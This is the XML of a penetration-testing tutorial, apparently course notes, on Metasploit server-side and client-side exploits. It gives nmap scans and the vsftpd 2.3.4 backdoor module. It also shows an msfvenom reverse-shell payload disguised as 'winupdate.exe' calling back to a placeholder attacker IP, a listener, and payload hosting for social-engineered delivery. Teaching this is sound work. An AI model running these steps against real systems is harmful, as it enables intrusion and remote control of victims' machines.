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ABF63" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Day 13 – Hacking with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD0E63" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DA224" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Metasploit is a powerful penetration testing framework that allows security researchers and ethical hackers to discover, exploit, and validate vulnerabilities. Exploits can generally be divided into two main categories:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Server-Side Exploits</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Client-Side Exploits</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Understanding these categories is crucial for selecting the right attack vector based on reconnaissance results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11FF12" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Server-Side Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63730DA9" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDFE81B" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>A server-side exploit targets vulnerabilities in services or applications running on a server that are accessible over the network. These vulnerabilities can be in web servers, database servers, FTP services, SMB shares, mail servers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD83A3C" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 How They Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113EF541" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. The attacker scans the target for open ports and services.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. They identify software versions running on the server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3. Using vulnerability databases (Exploit-DB, Rapid7, etc.), they match the version to known exploits.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. The exploit is executed remotely, without requiring user interaction from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37536FD8" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Example Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F671E9" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077CB337" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sudo nmap -sS -sV target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F407F7" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- -sS: Stealth SYN scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE27769" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- -sV: Detects service versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440BA11B" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Aggressive Scan (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3057DD" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sudo nmap -A target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A75E9A" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Includes OS detection, version detection, script scanning, and traceroute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4FEF4" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Select a Vulnerable Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115BBA5" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Example: FTP service running vsftpd 2.3.4 (known to have a backdoor exploit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC7D16" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit with Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E78E29" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>set RHOST target_ip</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12457438" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Client-Side Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D883A19" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E299BF0" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>A client-side exploit targets vulnerabilities in the user’s application — typically browsers, document readers, media players, or other software. These attacks require the victim to interact with malicious content (e.g., open a file, click a link).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D500B45" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 How They Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD4209" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. The attacker creates a malicious payload.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. The payload is embedded in a file or served via a webpage.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3. The victim downloads or opens it.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. Upon execution, the payload connects back to the attacker, giving them control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776B49A7" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Example Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F58B91" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Create Payload with msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF83C47" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;attacker_ip&gt; LPORT=8888 -f exe -o winupdate.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- -p windows/meterpreter/reverse_tcp: Payload type (reverse TCP shell for Windows)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- LHOST: Attacker IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- LPORT: Listening port</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- -f exe: Output format</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- -o winupdate.exe: Output file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D3A45" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Start Multi/Handler in Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B215809" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>set LHOST &lt;attacker_ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>set LPORT 8888</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B2B7C" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Serve the Payload via Python HTTP Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E000232" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41612350" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Hosts the payload at http://&lt;attacker_ip&gt;/winupdate.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Victim downloads it (social engineering often required).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46948429" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9EF967" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Once the victim runs the file, the reverse shell connects back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2BC75" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Key Differences Between Server-Side and Client-Side Exploits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102EF" w14:paraId="185538FD" w14:textId="77777777" w:rsidTr="00C13961">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6294BEC0" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F66BB51" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Server-Side Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="232CFE06" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Client-Side Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1019FFBA" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50744A5A" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005102EF" w14:paraId="37C13E6C" w14:textId="77777777" w:rsidTr="00C13961">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1877F0AB" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C5890C9" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable service on a server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB73F7D" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable application on client machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0BA1C3" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62497959" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005102EF" w14:paraId="6056C77C" w14:textId="77777777" w:rsidTr="00C13961">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B848F14" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Initiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77719D92" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Attacker initiates attack remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB6E9CA" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Victim must execute/open malicious content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7033DF0B" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1100A215" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005102EF" w14:paraId="602FF019" w14:textId="77777777" w:rsidTr="00C13961">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C2FC14D" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>User Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F179E55" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Not required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58220A5B" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF418FB" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B6F1972" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005102EF" w14:paraId="40EF590B" w14:textId="77777777" w:rsidTr="00C13961">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A1AC613" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="602D9C52" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploiting an outdated Apache server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D2D253" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Sending a malicious PDF to a victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42DBA081" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA95358" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005102EF" w14:paraId="58E90F67" w14:textId="77777777" w:rsidTr="00C13961">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3937E16C" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FCFD1B0" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Can compromise entire server infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52AC2487" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Limited to client system, but can escalate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="310235D9" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD88167" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="005102EF"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000CB19" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Security Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C280B" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Legality: Running these attacks without permission is illegal.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Detection: IDS/IPS systems can detect exploit attempts.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Social Engineering: Client-side attacks often rely on convincing the user to run the file.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Payload Evasion: Antivirus and EDR solutions may detect basic payloads; obfuscation or encoding may be required for advanced testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18FD0B" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B08ED3" w14:textId="77777777" w:rsidR="005102EF" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Server-side exploits attack services directly, based on vulnerabilities found during scanning.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Client-side exploits rely on user action to trigger the malicious code.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Metasploit provides tools for both, along with payload generation (msfvenom) and listener setup (multi/handler).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Serving payloads can be done with a Python HTTP server for quick delivery during testing.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005102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746736">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1325742304">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="963540749">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="502820751">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="975916731">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="317077307">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1599292250">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1021323165">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="124002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02EF"/>
    <w:rsid w:val="008018A0"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C139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27E6"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{F2BF7171-59CF-460A-A0D7-594F3E38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22-NTU-CS-1200</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-11T11:46:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>